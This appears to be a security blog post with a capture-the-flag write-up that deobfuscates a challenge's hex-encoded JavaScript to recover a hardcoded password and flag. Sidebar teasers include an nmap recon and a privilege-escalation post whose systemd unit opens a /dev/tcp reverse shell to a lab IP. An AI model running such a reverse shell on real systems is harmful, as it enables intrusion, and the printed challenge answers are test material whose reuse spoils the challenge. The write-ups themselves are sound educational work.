Skip to main content

Ringzer0 - Java Script - Then obfuscation is more secure

Ringzer0 - Java Script - Then obfuscation is more secure


Objective:  Get that Flag

Solution:

Ok so this is another Java Script challenge so the first thing I did was look in the source code for some java script

Found it!

var _0xc360=["\x76\x61\x6C","\x23\x63\x70\x61\x73\x73","\x61\x6C\x6B\x33","\x30\x32\x6C\x31","\x3F\x70\x3D","\x69\x6E\x64\x65\x78\x4F\x66","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x65\x72\x72\x6F\x72\x27\x3E\x57\x72\x6F\x6E\x67\x20\x70\x61\x73\x73\x77\x6F\x72\x64\x20\x73\x6F\x72\x72\x79\x2E\x3C\x2F\x64\x69\x76\x3E","\x68\x74\x6D\x6C","\x23\x63\x72\x65\x73\x70\x6F\x6E\x73\x65","\x63\x6C\x69\x63\x6B","\x2E\x63\x5F\x73\x75\x62\x6D\x69\x74"];$(_0xc360[12])[_0xc360[11]](function (){var _0xf382x1=$(_0xc360[1])[_0xc360[0]]();var _0xf382x2=_0xc360[2];if(_0xf382x1==_0xc360[3]+_0xf382x2){if(document[_0xc360[7]][_0xc360[6]][_0xc360[5]](_0xc360[4])==-1){document[_0xc360[7]]=document[_0xc360[7]][_0xc360[6]]+_0xc360[4]+_0xf382x1;} ;} else {$(_0xc360[10])[_0xc360[9]](_0xc360[8]);} ;} );  


Looks like a bunch of hex, Lets see if we can translate any of this to ascii

I used this site    http://ddecode.com/hexdecoder/

which gave me this code

var _0xc360=["val","#cpass","alk3","02l1","?p=","indexOf","href","location","<div class='error'>Wrong password sorry.</div>","html","#cresponse","click",".c_submit"];$(_0xc360[12])[_0xc360[11]](function (){var _0xf382x1=$(_0xc360[1])[_0xc360[0]]();var _0xf382x2=_0xc360[2];if(_0xf382x1==_0xc360[3]+_0xf382x2){if(document[_0xc360[7]][_0xc360[6]][_0xc360[5]](_0xc360[4])==-1){document[_0xc360[7]]=document[_0xc360[7]][_0xc360[6]]+_0xc360[4]+_0xf382x1;} ;} else {$(_0xc360[10])[_0xc360[9]](_0xc360[8]);} ;} );


so some of this was definitely just hex obfuscation

It looks like we are declaring  a list and then doing some if then else statements on the list

Here it is a little cleaned up to format the way I would expect JS ( I have done any java script in about a decade so I'm just using some common sense here to try to map out the code)

var _0xc360=["val","#cpass","alk3","02l1","?p=","indexOf","href","location","<div class='error'>Wrong password sorry.</div>","html","#cresponse","click",".c_submit"];
$(_0xc360[12])[_0xc360[11]](
function ()
{var _0xf382x1=$(_0xc360[1])[_0xc360[0]]();
var _0xf382x2=_0xc360[2];
if(_0xf382x1==_0xc360[3]+_0xf382x2){if(document[_0xc360[7]][_0xc360[6]][_0xc360[5]](_0xc360[4])==-1){document[_0xc360[7]]=document[_0xc360[7]][_0xc360[6]]+_0xc360[4]+_0xf382x1;} ;}
else {$(_0xc360[10])[_0xc360[9]](_0xc360[8]);} ;} );

now I just used a little RE trick to replace variable names with something a bit more meaningful

like for example 0xc360 is a list so I'm going to rename all instances of that with VarList
so I can have an easier time figuring out what is going on


now I got

var VarList=["val","#cpass","alk3","02l1","?p=","indexOf","href","location","<div class='error'>Wrong password sorry.</div>","html","#cresponse","click",".c_submit"];
$(VarList[12])[VarList[11]](
function ()
{var _0xf382x1=$(VarList[1])[VarList[0]]();
var _0xf382x2=VarList[2];
if(_0xf382x1==VarList[3]+_0xf382x2){if(document[VarList[7]][VarList[6]][VarList[5]](VarList[4])==-1){document[VarList[7]]=document[VarList[7]][VarList[6]]+VarList[4]+_0xf382x1;} ;}
else {$(VarList[10])[VarList[9]](VarList[8]);} ;} );

There are a couple more variable declarations I can rename to help clear it up a bit more

I'll rename 0xf382x1 to VarVar1
and oxf382x2 to VarVar2

ok now with all that ugly hex and crazy variables out of the way I can kind of start to see whats going here

var VarList=["val","#cpass","alk3","02l1","?p=","indexOf","href","location","<div class='error'>Wrong password sorry.</div>","html","#cresponse","click",".c_submit"];
$(VarList[12])[VarList[11]](
function ()
{var VarVar1=$(VarList[1])[VarList[0]]();
var _VarVar2=VarList[2];
if(VarVar1==VarList[3]+_VarVar2){if(document[VarList[7]][VarList[6]][VarList[5]](VarList[4])==-1){document[VarList[7]]=document[VarList[7]][VarList[6]]+VarList[4]+VarVar1;} ;}
else {$(VarList[10])[VarList[9]](VarList[8]);} ;} );


next I'm going to replace the VarList[*] with their corresponding values in the list to see if we can figure out exactly whats going on


var VarList=["val","#cpass","alk3","02l1","?p=","indexOf","href","location","<div class='error'>Wrong password sorry.</div>","html","#cresponse","click",".c_submit"];
$(.c_submit)[click](
function ()
{var VarVar1=$(#cpass)[val]();
var _VarVar2=alk3;
if(VarVar1==02l1+_VarVar2)
{if(document[Location][href][indexof](?p=)==-1){document[Location]=document[Location][href]+?p=+VarVar1;} ;}
else {$(#cresponse)[html](<div class='error'>Wrong password sorry.</div>);} ;} );

I'm going to focus on that first If statement because it looks like its checking to see if we are supplying the correct password

if VarVar1 == 02l1 + VarVar2

lets parse that out a bit more

if VarVar1 = 02l1 + alk3

if VarVar1 = 02l1alk3



so its comparing the password to 02l1alk3

lets see if that works


that got us the flag

FLAG-5PJne3T8d73UGv4SCqN44DXj  









Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more